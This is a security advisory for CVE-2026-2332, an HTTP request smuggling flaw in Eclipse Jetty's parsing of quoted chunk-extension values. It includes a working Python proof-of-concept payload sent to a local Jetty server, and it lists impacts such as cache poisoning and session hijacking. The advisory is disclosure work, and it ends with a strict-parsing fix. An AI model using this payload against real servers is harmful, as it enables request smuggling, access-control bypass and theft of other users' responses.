PT-2026-32618 · Eclipse Foundation+1 · Eclipse Jetty+1
Xclow3N · Published 2026-04-14 · Updated 2026-04-14 · CVE-2026-2332
CVSS v3.1: 7.4 High (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
Description (as reported)
Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.
Background
This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques:
The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.
Technical Details
RFC 9112 Section 7.1.1 defines chunked transfer encoding:
```
chunk         = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext     = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
```
RFC 9110 Section 5.6.4 defines quoted-string:
```
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
```
A quoted-string continues until the closing DQUOTE, and `\r\n` sequences are not permitted within the quotes.
Vulnerability
Jetty terminates chunk header parsing at `\r\n` inside quoted strings instead of treating this as an error.
```
Expected (RFC compliant):
Chunk: 1;a="value\r\nhere"\r\n
        ^^^^^^^^^^^^^^^^^^ extension value
Body:  [1 byte after the real \r\n]

Actual (jetty):
Chunk: 1;a="value
            ^^^^^ terminates here (WRONG)
Body:  here"... treated as body/next request
```
Proof of Concept
```python
#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

# Read until the server closes the connection or the socket times out.
response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break
sock.close()

# Count the status lines returned on this single connection.
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
```
Result: Server returns 2 HTTP responses from a single TCP connection.
Parsing Breakdown
| Parser | Request 1 | Request 2 |
|---|---|---|
| jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) |
| RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) |
Impact
- Request Smuggling: Attacker injects arbitrary HTTP requests
- Cache Poisoning: Smuggled responses poison shared caches
- Access Control Bypass: Smuggled requests bypass frontend security
- Session Hijacking: Smuggled requests can steal other users' responses
Reproduction
- Start the minimal PoC with Docker
- Run the PoC script provided in the same zip
Suggested Fix
Ensure the chunk framing and extensions are parsed exactly as specified in RFC 9112.
A CRLF inside a quoted-string should be considered a parsing error and not a line terminator.
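The strict parsing this fix calls for can be sketched as follows. This is an added example, not Jetty's code or its patch; the names `parse_chunk_header` and `ChunkFramingError` are hypothetical. It walks the RFC 9112 chunk-header grammar and rejects any CR, LF or control byte inside a quoted extension value instead of treating it as the end of the line.

```python
TCHAR = frozenset(b"!#$%&'*+-.^_`|~0123456789"
                  b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
HEXDIG = frozenset(b"0123456789abcdefABCDEF")
BWS = frozenset(b" \t")
# HTAB / SP / VCHAR / obs-text: what may appear in a quoted-string (no CR, LF, controls)
TEXT = frozenset([0x09, 0x20, *range(0x21, 0x7F), *range(0x80, 0x100)])
POC_CHUNK = b'1;a="\r\nX\r\n'  # first chunk of the page's PoC request

class ChunkFramingError(ValueError):
    """Hypothetical error type: the chunk header violates the grammar; reject the message."""

def _run(buf, i, allowed, need=None):
    """Index just past the run of `allowed` bytes at i; `need` names a mandatory run."""
    j = i
    while j < len(buf) and buf[j] in allowed:
        j += 1
    if need and j == i:
        raise ChunkFramingError(f"missing {need}")
    return j

def _quoted_string(buf, i):
    """Consume a quoted-string whose opening DQUOTE is buf[i]; return the index after it."""
    i += 1
    while i < len(buf):
        if buf[i] == 0x22:              # closing DQUOTE
            return i + 1
        if buf[i] == 0x5C:              # quoted-pair: validate the escaped byte instead
            i += 1
        if i >= len(buf) or buf[i] not in TEXT:
            raise ChunkFramingError("CR, LF, control byte or truncation in quoted-string")
        i += 1
    raise ChunkFramingError("unterminated quoted-string")

def parse_chunk_header(buf):
    """Return (chunk_size, header_length) for the chunk header at the start of buf."""
    n = i = _run(buf, 0, HEXDIG, "chunk-size")
    while True:
        j = _run(buf, i, BWS)
        if buf[j:j + 1] != b";":
            break
        i = _run(buf, _run(buf, j + 1, BWS), TCHAR, "chunk-ext-name")
        j = _run(buf, i, BWS)
        if buf[j:j + 1] == b"=":
            i = _run(buf, j + 1, BWS)
            quoted = buf[i:i + 1] == b'"'
            i = _quoted_string(buf, i) if quoted else _run(buf, i, TCHAR, "chunk-ext-val")
    if buf[i:i + 2] != b"\r\n":
        raise ChunkFramingError("chunk header not terminated by CRLF")
    return int(buf[:n], 16), i + 2
```

Calling `parse_chunk_header(POC_CHUNK)` raises `ChunkFramingError`, so the connection can be failed before any bytes after the quoted CRLF are interpreted as a body or a second request.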
Patches
No patches yet.
Workarounds
No workarounds yet.
Fix
HTTP Request/Response Smuggling
Weakness Enumeration
Related Identifiers
Affected Products
Eclipse Jetty
Org.Eclipse.Jetty:Jetty-Http